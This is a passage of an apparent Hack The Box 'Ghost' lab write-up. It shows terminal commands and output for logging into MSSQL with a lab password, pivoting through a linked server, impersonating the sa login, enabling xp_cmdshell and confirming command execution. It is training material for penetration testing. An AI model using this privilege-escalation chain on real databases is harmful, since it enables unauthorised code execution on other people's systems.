MSSQL
Using the credential of the florence.ramirez user, I can attempt to connect to the target MSSQL instance
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ KRB5CCNAME=florence.ramirez@dc01.ghost.htb.ccache impacket-mssqlclient 'GHOST.HTB/florence.ramirez@dc01.ghost.htb' -k -no-pass -dc-ip $IP -debug
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Encryption required, switching to TLS
[+] Using Kerberos Cache: florence.ramirez@dc01.ghost.htb.ccache
[+] SPN MSSQLSVC/DC01.GHOST.HTB:1433@GHOST.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/GHOST.HTB@GHOST.HTB
[+] Using TGT from cache
[+] Searching target's instances to look for port number 1433
[+] Trying to connect to KDC at 10.10.11.24:88
[+] Server time (UTC): 2024-07-16 13:40:12
[+] Exception:
Traceback (most recent call last):
File "/usr/share/doc/python3-impacket/examples/mssqlclient.py", line 97, in <module>
res = ms_sql.kerberosLogin(options.db, username, password, domain, options.hashes, options.aesKey,
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/tds.py", line 770, in kerberosLogin
tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, domain, kdcHost, tgt, cipher, sessionKey)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/krb5/kerberosv5.py", line 451, in getKerberosTGS
r = sendReceive(message, domain, kdcHost)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/krb5/kerberosv5.py", line 91, in sendReceive
raise krbError
impacket.krb5.kerberosv5.KerberosError: Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)For some unknown reasons, Kerberos authentication fails with the TGT of the florence.ramirez user against the target MSSQL instance.
It is possible that the target MSSQL instance is not configured to accept Kerberos authentication
Or that there is something wrong with DNS
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ impacket-mssqlclient florence.ramirez@$IP -target-ip $IP -windows-auth -debug
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
Password: uxLmt*udNc6t3HrF
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (GHOST\florence.ramirez guest@master)> However, the direct windows NTLM authentication works.
The florence.ramirez user has guest level access to the master DB
SQL (GHOST\florence.ramirez guest@msdb)> enable_xp_cmdshell
ERROR: Line 1: You do not have permission to run the RECONFIGURE statement.Attempting to enable the xp_cmdshell fails likely due to lack of privileges
Linked Server
SQL (GHOST\florence.ramirez guest@master)> enum_links
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
-------- ---------------- ----------- -------------- ------------------ ------------ -------
DC01 SQLNCLI SQL Server DC01 NULL NULL NULL
PRIMARY SQLNCLI SQL Server PRIMARY NULL NULL NULL
Linked Server Local Login Is Self Mapping Remote Login
------------- ----------- --------------- ------------
SQL (GHOST\florence.ramirez guest@master)> EXEC sp_linkedservers
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
-------- ---------------- ----------- -------------- ------------------ ------------ -------
DC01 SQLNCLI SQL Server DC01 NULL NULL NULL
PRIMARY SQLNCLI SQL Server PRIMARY NULL NULL NULL
SQL (GHOST\florence.ramirez guest@master)> SELECT @@SERVERNAME AS CurrentServer;
CurrentServer
-------------
DC01 Checking the linked servers, there is another MSSQL instance,PRIMARY, in the PRIMARY host. and I am currently connected to the DC01 MSSQL server in the DC01 host
SQL (GHOST\florence.ramirez guest@master)> use_link [PRIMARY]
SQL >[PRIMARY] (bridge_corp bridge_corp@master)> Switching over to the PRIMARY MSSQL instance
I am now the bridge_corp account
Impersonation
SQL >[PRIMARY] (bridge_corp bridge_corp@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ----------- -------
b'LOGIN' b'' IMPERSONATE GRANT bridge_corp sa I am able to impersonate the sa account in the PRIMARY MSSQL instance as the bridge_corp account
SQL >[PRIMARY] (bridge_corp bridge_corp@master)> exec_as_login sa
SQL >[PRIMARY] (sa dbo@master)> Logging in as the sa account
xp_cmdshell
SQL >[PRIMARY] (sa dbo@master)> enable_xp_cmdshell
[*] INFO(PRIMARY): Line 196: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(PRIMARY): Line 196: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.I can now enable xp_cmdshell as the sa account
SQL >[PRIMARY] (sa dbo@master)> xp_cmdshell whoami
output
----------------------
nt service\mssqlserver
NULL Code execution confirmed Moving on to the Lateral Movement phase